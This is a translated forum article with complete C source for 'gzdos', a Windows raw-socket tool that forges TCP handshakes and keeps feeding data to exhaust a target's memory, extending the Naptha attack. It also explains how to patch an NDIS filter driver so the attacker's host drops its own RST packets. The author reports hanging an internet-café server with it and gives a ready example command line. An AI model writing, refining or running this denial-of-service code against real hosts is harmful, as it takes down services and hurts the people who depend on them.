Author: liond8
Email: liond8@126.com
Transfer from Jiakang
Test platform VC 6.0 windows2000 server
Target platform: Windows 2000, Windows XP. (Caveat: this tool sends hand-built TCP segments over a raw socket with IP_HDRINCL; Microsoft restricted that from Windows XP SP2 onward, so expect it to fail on later systems.)
???? I was suddenly inspired by the Naptha attack and wanted to extend its forged-connection technique so that it could be run from an ordinary PC rather than being limited to a LAN. I spent some time studying what is written below; it is not nonsense. I am sharing it now although it is not very mature, and I hope to discuss it with you.
???? About NAPTHA: the original Naptha tool was written in 2000. Why did it require a LAN? Partly to stay better hidden, but the more important reason is to keep the attacker's own host from ever seeing the second handshake step (the SYN/ACK) from the remote host: the attacker's own TCP stack has no socket for that connection, so it would answer with an RST and tear the forged connection down. Naptha also had little effect on Windows; how much memory Windows consumes depends on the data being retransmitted when the retransmission counter restarts (the original wording here is unclear).
???? In the diagram below A is the attacker and C is the target:
???? a syn --------> C
???? a syn, Ack <----- c
???? a ACK --------> C
???? a send data -----> C
???? a Ack <-------- C
???? a send data -----> C
???? a Ack <-------- C
???? ...
Test Results:
???? Against an ordinary ephemeral port (port 1025 was used) it is quite effective: the target's memory keeps rising until the machine stops responding and crashes. Twenty minutes was enough to hang an internet-café server.
???? Against port 80 with a maximum of 100 connections the effect is less obvious: it consumed about 40 MB of memory and then started to repeat, leaving large numbers of connections in the FIN_WAIT_1 and ESTABLISHED states.
???? Other ports I could not test conveniently in my limited environment. If you are in a position to test, please tell me your results; discussion is welcome.
So there are roughly two problems to solve:
1. Hook and drop the RST packets that this machine's own stack sends for the forged connections.
???? Reference: Flashsky's article "Writing an NDIS filter-hook driver to implement IP packet filtering":
????
http://www.xfocus.net/articles/200210/457.html
???? Only one line of that driver needs to change.
Change `if (packet[13] == 0x2 && sendInterfaceIndex == INVALID_PF_IF_INDEX)`
to `if (packet[13] == 0x4 && sendInterfaceIndex != INVALID_PF_IF_INDEX)` — that is, instead of matching SYN (flags byte 0x02) on packets being received (no send interface), match RST (flags byte 0x04) on packets this host is sending (a valid send-interface index) and drop them. Byte 13 is the TCP flags byte, assuming `packet` points at the start of the TCP header. Be aware that this drops every outbound RST from the host, not only those belonging to the forged connections, so normal RST behaviour for all other traffic is broken while the driver is loaded.
See the original article for details; it is very thorough.
2. Forging the data transmission.
???? Sniffer analysis shows that the forged SYN must also carry the TCP options (in particular it must negotiate the MSS); otherwise, even though the connection is established, the other side never acknowledges the data we send, so it cannot be made to buffer it and consume memory. An ordinary SYN scan, and Naptha's connect request, send a bare 20-byte TCP header with no options. The option bytes differ from system to system: on my Windows 2000 they are 8 bytes, on a friend's Windows 2000 12 bytes. Taking my machine as the example, 8 bytes of options give a 28-byte TCP header, so the data-offset byte is TCP_HEAD.TH_LENRES = 0x70 (7 words).
Another point worth spelling out is the calculation of the TCP checksum:
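/*
 * RFC 1071 Internet checksum over `size` bytes of `buffer`: sum the data as
 * 16-bit words (host order), add an odd trailing byte as-is, fold the carries
 * back into 16 bits and return the ones'-complement.  Storing the result in
 * host order, as the callers do, yields the correct network-order checksum.
 * The caller lays the pseudo header, TCP header, options and data out
 * contiguously in `buffer`.
 */
unsigned short checksum(unsigned short *buffer, int size)
{
    unsigned long cksum = 0;

    while (size > 1) {
        cksum += *buffer++;
        size -= (int)sizeof(unsigned short);
    }
    /* Odd trailing byte: zero-padded on the far side, so it is just added. */
    if (size) {
        cksum += *(unsigned char *)buffer;
    }
    /* Fold twice: the first fold can itself produce a carry. */
    cksum = (cksum >> 16) + (cksum & 0xffff);
    cksum += (cksum >> 16);
    return (unsigned short)(~cksum);
}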
When the segment carries data after the 20-byte TCP header, the value this function produces does not match what Windows 2000 computes; analysis shows the difference is related to the data length. For example, with a 20-byte IP header, a 20-byte TCP header and 2 bytes of data, the checksum function gives 0x4523 while the system gives 0x4323 (in host order, 0x2345 versus 0x2343: off by exactly the 2 data bytes). The actual cause is visible in the code: the pseudo header's `tcpl` field is set to `htons(sizeof(TCPHEADER))`, i.e. a fixed 20, whereas RFC 793 requires the TCP length to cover header, options and data. Because the checksum is a ones'-complement sum, every byte missing from `tcpl` shifts the result by exactly that amount, which is why subtracting the data length happens to repair it. Setting `tcpl` to `sizeof(TCPHEADER) + dwsize` (and `+ optlen` for the SYN) removes the need for the adjustment below.
The original therefore does:
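tcpheader.th_sum = checksum((USHORT *)szsendbuf, sizeof(PSDHEADER) + sizeof(TCPHEADER) + dwsize);
/* Compensates for psdheader.tcpl holding sizeof(TCPHEADER) instead of
 * sizeof(TCPHEADER) + dwsize: the ones'-complement sum is then short by
 * dwsize, so the complemented checksum is high by dwsize.  Filling tcpl in
 * correctly makes this adjustment unnecessary. */
tcpheader.th_sum = htons(ntohs(tcpheader.th_sum) - (USHORT)dwsize);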
where DWSIZE is the length of the data. Without this the target does not accept the forged segment, and memory on the target is not consumed.
Here is the test code. Because the program can do real harm, it is deliberately not written as a convenient point-and-shoot tool: you have to sniff the TCP option bytes of a real SYN yourself and pass them as a hex string on the command line.
E.g.:
gzdos.exe 192.168.248.128 1025 020405b401010402 1000 65534
(target IP, target port, TCP option bytes in hex, sleep in milliseconds between SYNs, and optionally the first source port). Running gzdos.exe with no arguments prints the banner and the usage line; the argument placeholders of the original usage line were lost in this copy.
Source code:
#include "stdio.h"
#include <stdlib.h>
#include <string.h>
#include "winsock2.h"
#include "windows.h"
#include 
#include "wchar.h"
#pragma comment(lib, "ws2_32.lib")
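/* Receive-all (promiscuous) ioctl for a raw socket; the same value Windows
 * publishes as SIO_RCVALL in mstcpip.h.  Used by listeningfunc(). */
#define SIO_RCVALL _WSAIOW(IOC_VENDOR, 1)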
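/* Run-time configuration; the defaults are overwritten from argv in main(). */
char           *attackip   = "192.168.248.128"; /* target IPv4 address, dotted quad (argv[1]) */
unsigned short  attackport = 135;               /* target TCP port, host order (argv[2]) */
unsigned short  startport  = 1;                 /* first source port of the SYN sweep (argv[5]) */
int             sleeptime  = 2000;              /* milliseconds between SYNs (argv[4]) */
unsigned char  *optbuf     = NULL;              /* raw TCP option bytes decoded from argv[3] by convertopt() */
char           *psend      = NULL;              /* payload of every forged data segment, filled in main() */
DWORD           len        = 0;                 /* strlen(psend) */
unsigned short  optlen     = 0;                 /* number of bytes in optbuf */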
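/* IPv4 header without options (20 bytes); multi-byte fields in network order. */
typedef struct ip_head
{
    unsigned char  h_verlen;        /* version in the high nibble, header length in 32-bit words in the low nibble */
    unsigned char  tos;
    unsigned short total_len;       /* IP header + TCP header + options + data */
    unsigned short ident;
    unsigned short frag_and_flags;
    unsigned char  ttl;
    unsigned char  proto;           /* IPPROTO_TCP for everything this file sends */
    unsigned short checksum;        /* left 0 by the senders here; whether the stack fills it under IP_HDRINCL depends on the OS -- confirm */
    unsigned int   sourceip;
    unsigned int   destip;
} IPHEADER;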
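/* TCP header (20 bytes, options follow separately); fields in network order. */
typedef struct tcp_head
{
    unsigned short th_sport;
    unsigned short th_dport;
    unsigned int   th_seq;
    unsigned int   th_ack;
    unsigned char  th_lenres;   /* data offset in 32-bit words in the high nibble, reserved bits low */
    unsigned char  th_flag;     /* 0x02 SYN, 0x04 RST, 0x10 ACK, 0x12 SYN|ACK, 0x18 PSH|ACK */
    unsigned short th_win;
    unsigned short th_sum;
    unsigned short th_urp;
} TCPHEADER;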
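/* TCP pseudo header (RFC 793) laid in front of the segment when th_sum is computed. */
typedef struct psd_hdr
{
    unsigned int   saddr;   /* originally unsigned long: 32-bit on Win32 but 64-bit on LP64 hosts, so the width is pinned here */
    unsigned int   daddr;
    char           mbz;     /* must be zero */
    char           ptcl;    /* IPPROTO_TCP */
    unsigned short tcpl;    /* TCP length = header + options + data, network order */
} PSDHEADER;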
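/* One target: its address plus a 0-terminated list of ports, all in network order. */
typedef struct attack_obj
{
    DWORD               dwip;
    unsigned short      uattackport[11];   /* up to 10 ports followed by a 0 terminator */
    struct attack_obj  *next;
} ATOBJ;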
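ATOBJ *listattackobj = NULL;   /* singly linked target list, built by initstart() */

BOOL           initstart(void);
DWORD          gethostip(void);
unsigned short checksum(unsigned short *buffer, int size);
DWORD WINAPI   threadsynflood(LPVOID lp);
void           senddata(DWORD seq, DWORD ack, USHORT sport, USHORT aport,
                        DWORD sip, DWORD aip, char *pbuf, BOOL isdata, DWORD dwsize);
DWORD WINAPI   listeningfunc(LPVOID lpvoid);
void           banner(void);
void           debugip(DWORD dwip);
void           convertopt(char *pu);

/* Raw IP_HDRINCL socket shared by every sender; opened in initstart().
 * SOCKET is unsigned, so INVALID_SOCKET rather than NULL is the "not open" value. */
SOCKET sock = INVALID_SOCKET;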
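/*
 * Entry point.
 *   argv[1]  target IPv4 address (dotted quad)
 *   argv[2]  target TCP port
 *   argv[3]  TCP options for the SYN as a hex string, sniffed from a real SYN
 *            of the local stack (e.g. "020405b401010402")
 *   argv[4]  milliseconds to sleep between SYNs
 *   argv[5]  first source port of the sweep (optional, default 1)
 * Builds the payload, parses the arguments, opens the raw socket (initstart),
 * starts one sniffer thread per local address (listeningfunc), runs the SYN
 * sweep on this thread and then sleeps so the sniffers keep answering.
 * Returns -1 on any setup error, 0 otherwise.
 */
int main(int argc, char *argv[])
{
    char hostname[255] = {0};
    struct hostent *lp = NULL;
    int i = 0;

    banner();
    if (argc < 5) {
        printf("Input Error!\n");
        return -1;
    }

    /* Payload of every forged data segment: 799 x '8' (0x38) plus a NUL. */
    psend = (char *)malloc(800);
    if (psend == NULL) {
        printf("malloc error!\n");
        return -1;
    }
    memset(psend, 0x38, 799);
    psend[799] = 0;
    len = (DWORD)strlen(psend);

    attackip = strdup(argv[1]);
    if (attackip == NULL) {
        printf("strdup error!\n");
        return -1;
    }
    attackport = (unsigned short)atoi(argv[2]);

    /* TCP options for the SYN.  threadsynflood() encodes their length in the
     * data-offset nibble as whole 32-bit words, and the offset is at most 15
     * words, so the length must be a multiple of 4 and at most 40; optbuf[3]
     * is modified below, so at least 4 bytes are needed.  The original wrote
     * optbuf[3] before checking optbuf at all. */
    convertopt(argv[3]);
    if (optbuf == NULL || optlen < 4 || optlen > 40 || optlen % 4 != 0) {
        printf("Bad option bytes: need an even-length hex string of 4..40 bytes, a multiple of 4\n");
        return -1;
    }
    /* Decrements the low byte of the first option (the MSS value in the
     * sample 020405b4...).  The original gives no reason; presumably to
     * advertise a slightly different MSS than the sniffed one -- confirm. */
    optbuf[3] -= 1;

    /* The original tested argc == 5 and argc == 6 separately and left the
     * defaults in place for argc > 6; >= expresses the same intent. */
    sleeptime = atoi(argv[4]);
    if (argc >= 6)
        startport = (unsigned short)atoi(argv[5]);

    if (initstart() == FALSE)
        return -1;

    /* One sniffer thread per local IPv4 address; each binds its raw socket
     * to that address and switches on SIO_RCVALL. */
    if (gethostname(hostname, sizeof(hostname)) != 0 || (lp = gethostbyname(hostname)) == NULL) {
        printf("gethostbyname error!\n");
        return -1;
    }
    while (lp->h_addr_list[i] != NULL) {
        DWORD dwip = 0;
        HANDLE h;
        memcpy(&dwip, lp->h_addr_list[i++], sizeof(dwip));
        h = CreateThread(NULL, 0, listeningfunc, (LPVOID)dwip, 0, NULL);
        if (h == NULL) {
            printf("CREATE LISTENINGFUNC Thread False!\n");
            return -1;
        }
        CloseHandle(h);   /* the thread is never joined; drop our reference to it */
        Sleep(500);       /* presumably to let the sniffer bind before SYNs go out */
    }

    threadsynflood(NULL);   /* the sweep itself runs on the main thread */

    /* Stay alive after the sweep so the sniffer threads keep answering the
     * target's ACKs with more data. */
    Sleep(5555555);
    return 0;
}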
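/*
 * One-time setup: WSAStartup, the single-entry target list built from
 * attackip/attackport, and the raw IP_HDRINCL socket `sock` used by every
 * sender.  Returns TRUE on success; on failure prints the reason and returns
 * FALSE (the caller exits, so partially acquired resources are not released).
 */
BOOL initstart(void)
{
    BOOL flag = TRUE;
    int ntimeover = 2000;
    WSADATA wsadata;

    if (WSAStartup(MAKEWORD(2, 2), &wsadata) != 0) {
        printf("WSAStartup error!\n");
        return FALSE;
    }

    listattackobj = (ATOBJ *)calloc(1, sizeof(ATOBJ));
    if (listattackobj == NULL) {
        printf("calloc error!\n");
        return FALSE;
    }
    listattackobj->dwip = inet_addr(attackip);
    if (listattackobj->dwip == INADDR_NONE) {
        printf("bad target address: %s\n", attackip);
        return FALSE;
    }
    listattackobj->uattackport[0] = htons(attackport);
    listattackobj->uattackport[1] = 0;   /* list terminator */
    listattackobj->next = NULL;

    sock = socket(AF_INET, SOCK_RAW, IPPROTO_IP);
    if (sock == INVALID_SOCKET) {
        printf("socket setup error!\n");
        return FALSE;
    }
    /* We build the IP header ourselves (threadsynflood/senddata). */
    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) {
        printf("setsockopt IP_HDRINCL error!\n");
        return FALSE;
    }
    /* Send timeout so a blocked sendto() cannot wedge the sweep. */
    if (setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (char *)&ntimeover, sizeof(ntimeover)) == SOCKET_ERROR) {
        printf("setsockopt SO_SNDTIMEO error!\n");
        return FALSE;
    }
    return TRUE;
}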
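/*
 * SYN sweep: for every target in listattackobj and every source port from
 * startport up to 65534, send one forged SYN carrying the sniffed TCP options
 * (optbuf) and the fixed ISN 0x00198288; listeningfunc() recognises the
 * target's SYN/ACKs by that ISN.  Despite the WINAPI signature it is called
 * directly from main() and runs on that thread; `lp` is unused.
 * Returns 0 when the sweep finishes or the options are unusable, FALSE (also
 * 0) on a send error.
 */
DWORD WINAPI threadsynflood(LPVOID lp)
{
    ATOBJ *patobj = listattackobj;
    struct sockaddr_in addr_in;
    IPHEADER ipheader;
    TCPHEADER tcpheader;
    PSDHEADER psdheader;
    char szsendbuf[1024] = {0};
    int hdrlen = (int)(sizeof(IPHEADER) + sizeof(TCPHEADER) + optlen);
    (void)lp;

    /* The data offset is 4 bits of 32-bit words (max 40 option bytes), and the
     * pseudo-header copy must fit the scratch buffer. */
    if (optlen > 40 || optlen % 4 != 0 ||
        sizeof(PSDHEADER) + sizeof(TCPHEADER) + optlen > sizeof(szsendbuf)) {
        printf("option length %u invalid\n", (unsigned)optlen);
        return 0;
    }

    while (patobj != NULL) {
        memset(&addr_in, 0, sizeof(addr_in));   /* the original left sin_port/sin_zero uninitialised */
        addr_in.sin_family = AF_INET;
        addr_in.sin_addr.s_addr = patobj->dwip;

        ipheader.h_verlen = (unsigned char)((4 << 4) | (sizeof(IPHEADER) / 4));
        ipheader.tos = 0;
        ipheader.total_len = htons((unsigned short)hdrlen);
        ipheader.ident = 1;
        ipheader.frag_and_flags = 0x0040;   /* DF set, written in network byte order */
        ipheader.ttl = 0x80;
        ipheader.proto = IPPROTO_TCP;
        ipheader.checksum = 0;
        ipheader.destip = patobj->dwip;
        ipheader.sourceip = gethostip();

        tcpheader.th_ack = 0;
        tcpheader.th_lenres = (unsigned char)((optlen / 4 + 5) << 4);   /* 5 header words + option words */
        tcpheader.th_flag = 0x02;                                       /* SYN */
        tcpheader.th_win = htons(0x4470);
        tcpheader.th_urp = 0;
        tcpheader.th_seq = htonl(0x00198288);   /* fixed ISN; the sniffer matches ack == ISN + 1 */

        for (int l = startport; l < 65535; l++) {
            int k = 0;
            while (patobj->uattackport[k] != 0) {
                tcpheader.th_dport = patobj->uattackport[k++];
                tcpheader.th_sport = htons((unsigned short)l);
                tcpheader.th_sum = 0;

                /* RFC 793 pseudo header.  tcpl must cover header AND options;
                 * the original fixed it at 20 and then subtracted optlen from
                 * the checksum to compensate, which is no longer needed. */
                psdheader.saddr = ipheader.sourceip;
                psdheader.daddr = ipheader.destip;
                psdheader.mbz = 0;
                psdheader.ptcl = IPPROTO_TCP;
                psdheader.tcpl = htons((unsigned short)(sizeof(TCPHEADER) + optlen));

                memcpy(szsendbuf, &psdheader, sizeof(PSDHEADER));
                memcpy(szsendbuf + sizeof(PSDHEADER), &tcpheader, sizeof(TCPHEADER));
                memcpy(szsendbuf + sizeof(PSDHEADER) + sizeof(TCPHEADER), optbuf, optlen);
                tcpheader.th_sum = checksum((unsigned short *)szsendbuf,
                                            (int)(sizeof(PSDHEADER) + sizeof(TCPHEADER) + optlen));

                /* The datagram actually sent: IP header + TCP header + options. */
                memcpy(szsendbuf, &ipheader, sizeof(IPHEADER));
                memcpy(szsendbuf + sizeof(IPHEADER), &tcpheader, sizeof(TCPHEADER));
                memcpy(szsendbuf + sizeof(IPHEADER) + sizeof(TCPHEADER), optbuf, optlen);

                if (sendto(sock, szsendbuf, hdrlen, 0,
                           (struct sockaddr *)&addr_in, sizeof(addr_in)) == SOCKET_ERROR) {
                    printf("Send Error!:%x\n", WSAGetLastError());
                    return FALSE;
                }
                printf("           SEND OK %d\n", l);
            }
            Sleep(sleeptime);
        }
        patobj = patobj->next;
    }
    return 0;
}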
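/*
 * Returns the last IPv4 address in this host's gethostbyname() list, in
 * network order, used as the source address of every forged segment; 0 if
 * the lookup fails or yields no IPv4 address (the original dereferenced the
 * result unchecked).  "Last" is the original's choice -- on a multi-homed
 * host it need not be the interface that reaches the target.
 */
DWORD gethostip(void)
{
    char hostname[255] = {0};
    struct hostent *lp;
    DWORD dwip = 0;
    int i = 0;

    if (gethostname(hostname, sizeof(hostname)) != 0)
        return 0;
    lp = gethostbyname(hostname);
    if (lp == NULL || lp->h_addrtype != AF_INET || lp->h_addr_list == NULL || lp->h_addr_list[0] == NULL)
        return 0;
    while (lp->h_addr_list[i] != NULL)
        i++;
    memcpy(&dwip, lp->h_addr_list[i - 1], sizeof(dwip));
    return dwip;
}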
????
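/*
 * RFC 1071 Internet checksum over `size` bytes of `buffer`: sum the data as
 * 16-bit words (host order), add an odd trailing byte as-is, fold the carries
 * back into 16 bits and return the ones'-complement.  Storing the result in
 * host order, as the callers do, yields the correct network-order checksum.
 * The caller lays the pseudo header, TCP header, options and data out
 * contiguously in `buffer`.
 */
unsigned short checksum(unsigned short *buffer, int size)
{
    unsigned long cksum = 0;

    while (size > 1) {
        cksum += *buffer++;
        size -= (int)sizeof(unsigned short);
    }
    /* Odd trailing byte: zero-padded on the far side, so it is just added. */
    if (size) {
        cksum += *(unsigned char *)buffer;
    }
    /* Fold twice: the first fold can itself produce a carry. */
    cksum = (cksum >> 16) + (cksum & 0xffff);
    cksum += (cksum >> 16);
    return (unsigned short)(~cksum);
}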
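/*
 * Sniffer thread, one per local address.  `lpvoid` carries the local IPv4
 * address (network order) the raw socket is bound to; SIO_RCVALL then
 * delivers every incoming IP datagram on that interface.  For TCP segments
 * from attackip whose source port is attackport:
 *   SYN|ACK (0x12) with ack == ISN + 1  -> send the handshake ACK, then one data segment
 *   pure ACK (0x10)                     -> send another data segment
 * so the target keeps acknowledging and buffering payload nobody will read.
 * The source-port check is new: the original answered every ACK from the
 * target and so could inject payload into unrelated connections between this
 * host and the target.  Never returns normally; exit(0) on bind failure (kept
 * from the original) terminates the whole process.
 */
DWORD WINAPI listeningfunc(LPVOID lpvoid)
{
    SOCKET rawsock;
    struct sockaddr_in addr_in = {0};
    DWORD lpvbuffer = 1;
    DWORD lpcbbytesreturned = 0;
    DWORD target;
    int ret;

    rawsock = socket(AF_INET, SOCK_RAW, IPPROTO_IP);
    if (rawsock == INVALID_SOCKET) {
        printf("Sniffer Socket Setup Error!\n");
        return FALSE;
    }
    addr_in.sin_family = AF_INET;
    addr_in.sin_port = htons(8288);
    addr_in.sin_addr.s_addr = (DWORD)lpvoid;
    /* Bind to the local address so RCVALL applies to this interface. */
    if (bind(rawsock, (struct sockaddr *)&addr_in, sizeof(addr_in)) == SOCKET_ERROR) {
        printf("bind false\n");
        exit(0);
    }
    /* The original ignored this result; without RCVALL (administrator
     * rights required) no SYN/ACK is ever seen and the tool silently does nothing. */
    if (WSAIoctl(rawsock, SIO_RCVALL, &lpvbuffer, sizeof(lpvbuffer), NULL, 0,
                 &lpcbbytesreturned, NULL, NULL) == SOCKET_ERROR) {
        printf("WSAIoctl SIO_RCVALL error!:%x\n", WSAGetLastError());
        closesocket(rawsock);
        return FALSE;
    }
    target = inet_addr(attackip);

    while (TRUE) {
        struct sockaddr_in from = {0};
        int size = sizeof(from);
        char recvbuf[256] = {0};   /* only the headers are inspected */
        IPHEADER *lpipheader;
        TCPHEADER *lptcpheader;
        unsigned iphdrlen;

        /* NOTE(review): a datagram larger than recvbuf fails with WSAEMSGSIZE
         * and is skipped, as in the original; enlarge recvbuf if the target's
         * ACKs carry data. */
        ret = recvfrom(rawsock, recvbuf, sizeof(recvbuf), 0, (struct sockaddr *)&from, &size);
        if (ret == SOCKET_ERROR)
            continue;
        if (ret < (int)(sizeof(IPHEADER) + sizeof(TCPHEADER)))
            continue;   /* too short to hold both headers */

        lpipheader = (IPHEADER *)recvbuf;
        if (lpipheader->proto != IPPROTO_TCP || lpipheader->sourceip != target)
            continue;
        /* Honour the IP header length instead of assuming 20 bytes. */
        iphdrlen = (lpipheader->h_verlen & 0x0f) * 4u;
        if (iphdrlen < sizeof(IPHEADER) || ret < (int)(iphdrlen + sizeof(TCPHEADER)))
            continue;
        lptcpheader = (TCPHEADER *)(recvbuf + iphdrlen);
        if (lptcpheader->th_sport != htons(attackport))
            continue;   /* not one of our forged connections */

        if (lptcpheader->th_flag == 0x12) {                        /* SYN|ACK */
            if (lptcpheader->th_ack == htonl(0x00198289)) {        /* acknowledges our fixed ISN */
                /* Third handshake step: a bare ACK ... */
                senddata(lptcpheader->th_ack, htonl(ntohl(lptcpheader->th_seq) + 1),
                         lptcpheader->th_dport, lptcpheader->th_sport,
                         lpipheader->destip, lpipheader->sourceip, NULL, FALSE, 0);
                /* ... followed at once by the payload. */
                senddata(lptcpheader->th_ack, htonl(ntohl(lptcpheader->th_seq) + 1),
                         lptcpheader->th_dport, lptcpheader->th_sport,
                         lpipheader->destip, lpipheader->sourceip, psend, TRUE, len);
            }
        } else if (lptcpheader->th_flag == 0x10) {                 /* pure ACK: keep feeding */
            senddata(lptcpheader->th_ack, lptcpheader->th_seq,
                     lptcpheader->th_dport, lptcpheader->th_sport,
                     lpipheader->destip, lpipheader->sourceip, psend, TRUE, len);
        }
    }
}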
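/*
 * Build and send one forged TCP segment from sip:sport to aip:aport with the
 * given sequence/acknowledgement numbers.  pbuf == NULL sends a bare header;
 * otherwise dwsize bytes of pbuf follow it.  Flags are PSH|ACK (0x18) when
 * isdata is TRUE, plain ACK (0x10) otherwise.  Addresses, ports, seq and ack
 * are already in network order.  Prints the outcome and returns nothing; a
 * payload that would overflow the 1024-byte scratch buffer is refused (the
 * original memcpy'd it unchecked).
 */
void senddata(DWORD seq, DWORD ack, USHORT sport, USHORT aport, DWORD sip, DWORD aip,
              char *pbuf, BOOL isdata, DWORD dwsize)
{
    struct sockaddr_in addr_in;
    IPHEADER ipheader;
    TCPHEADER tcpheader;
    PSDHEADER psdheader;
    char szsendbuf[1024] = {0};
    int rect;

    if (pbuf == NULL)
        dwsize = 0;   /* no data to append, so count none in the lengths */
    if (sizeof(PSDHEADER) + sizeof(TCPHEADER) + dwsize > sizeof(szsendbuf)) {
        printf("SendData: payload too large (%lu)\n", (unsigned long)dwsize);
        return;
    }

    memset(&addr_in, 0, sizeof(addr_in));
    addr_in.sin_family = AF_INET;
    addr_in.sin_port = aport;
    addr_in.sin_addr.s_addr = aip;

    ipheader.h_verlen = (unsigned char)((4 << 4) | (sizeof(IPHEADER) / 4));
    ipheader.tos = 0;
    ipheader.ident = 1;
    ipheader.frag_and_flags = 0x0040;   /* DF set, written in network byte order */
    ipheader.ttl = 0x80;
    ipheader.proto = IPPROTO_TCP;
    ipheader.checksum = 0;
    ipheader.destip = aip;
    ipheader.sourceip = sip;
    ipheader.total_len = htons((unsigned short)(sizeof(IPHEADER) + sizeof(TCPHEADER) + dwsize));

    tcpheader.th_sport = sport;
    tcpheader.th_dport = aport;
    tcpheader.th_seq = seq;
    tcpheader.th_ack = ack;
    tcpheader.th_lenres = (unsigned char)((sizeof(TCPHEADER) / 4) << 4);   /* 0x50: no options */
    tcpheader.th_flag = isdata ? 0x18 : 0x10;                             /* PSH|ACK or ACK */
    tcpheader.th_win = htons(0x4470);
    tcpheader.th_urp = 0;
    tcpheader.th_sum = 0;

    /* RFC 793 pseudo header; tcpl covers header + data.  The original fixed
     * it at 20 and subtracted dwsize from the checksum afterwards (the
     * ones'-complement sum is off by exactly the bytes missing from tcpl);
     * filling tcpl in correctly removes the need for that adjustment. */
    psdheader.saddr = sip;
    psdheader.daddr = aip;
    psdheader.mbz = 0;
    psdheader.ptcl = IPPROTO_TCP;
    psdheader.tcpl = htons((unsigned short)(sizeof(TCPHEADER) + dwsize));

    memcpy(szsendbuf, &psdheader, sizeof(PSDHEADER));
    memcpy(szsendbuf + sizeof(PSDHEADER), &tcpheader, sizeof(TCPHEADER));
    if (dwsize)
        memcpy(szsendbuf + sizeof(PSDHEADER) + sizeof(TCPHEADER), pbuf, dwsize);
    tcpheader.th_sum = checksum((unsigned short *)szsendbuf,
                                (int)(sizeof(PSDHEADER) + sizeof(TCPHEADER) + dwsize));

    /* The datagram actually sent: IP header + TCP header (+ data). */
    memcpy(szsendbuf, &ipheader, sizeof(IPHEADER));
    memcpy(szsendbuf + sizeof(IPHEADER), &tcpheader, sizeof(TCPHEADER));
    if (dwsize)
        memcpy(szsendbuf + sizeof(IPHEADER) + sizeof(TCPHEADER), pbuf, dwsize);
    rect = sendto(sock, szsendbuf, (int)(sizeof(IPHEADER) + sizeof(TCPHEADER) + dwsize), 0,
                  (struct sockaddr *)&addr_in, sizeof(addr_in));
    if (rect == SOCKET_ERROR) {
        printf("Send Error!:%x\n", WSAGetLastError());
        return;
    }
    if (pbuf != NULL)
        printf("SendData OK %d\n", ntohs(sport));
    else
        printf("                   SendACK OK %d\n", ntohs(sport));
}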
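/* Print the program banner, the author's warning and the usage line to stdout.
 * The argument placeholders of the usage line were lost in this copy and are
 * restored from the argv handling in main(). */
void banner(void)
{
    printf("**************************************************\n");
    printf("                  Dog D.O.S TEST\n");
    printf("Maker by liond8. QQ: 10415468. Email: liond8@eyou.com\n");
    printf("    Welcome to my Website: http://liond8.126.com\n");
    printf("  is only available for licensed tests, otherwise it will cause any legal dispute to be self-contained\n");
    printf("**************************************************\n");
    printf("gzdos.exe <target ip> <target port> <tcp options hex> <sleep ms> [start port]\n");
}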
/* Print an IPv4 address (network order) as a dotted quad, without a newline. */
void debugip(DWORD dwip)
{
    struct in_addr a;
    a.s_addr = dwip;
    printf("%s", inet_ntoa(a));
}
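/* Value of one ASCII hex digit (either case), or -1 if c is not a hex digit. */
static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/*
 * Decode the hex string `pu` (the TCP options sniffed from a real SYN, e.g.
 * "020405b401010402") into the globals optbuf/optlen.  On bad input -- empty
 * or odd-length string, a non-hex character, more than 65535 bytes, or
 * allocation failure -- optbuf is left NULL and optlen 0 so the caller's
 * NULL check rejects it.  The original subtracted 0x37 from every character
 * above '8', which mis-decodes the digit '9' and lowercase a-f in the low
 * nibble; both are handled here.
 */
void convertopt(char *pu)
{
    size_t lentemp = strlen(pu);
    size_t i, k;
    unsigned char *buf;

    optbuf = NULL;
    optlen = 0;
    if (lentemp == 0 || lentemp % 2 != 0 || lentemp / 2 > 65535)
        return;

    buf = (unsigned char *)malloc(lentemp / 2);
    if (buf == NULL)
        return;
    for (i = 0, k = 0; i < lentemp; i += 2, k++) {
        int hi = hexval((unsigned char)pu[i]);
        int lo = hexval((unsigned char)pu[i + 1]);
        if (hi < 0 || lo < 0) {
            free(buf);
            return;
        }
        buf[k] = (unsigned char)((hi << 4) | lo);
    }
    optbuf = buf;
    optlen = (unsigned short)(lentemp / 2);
}

/*
 * References:
 *   Writing an NDIS filter-hook driver to implement IP packet filtering (Flashsky)
 *   TCP/IP Illustrated, Volume 1
 */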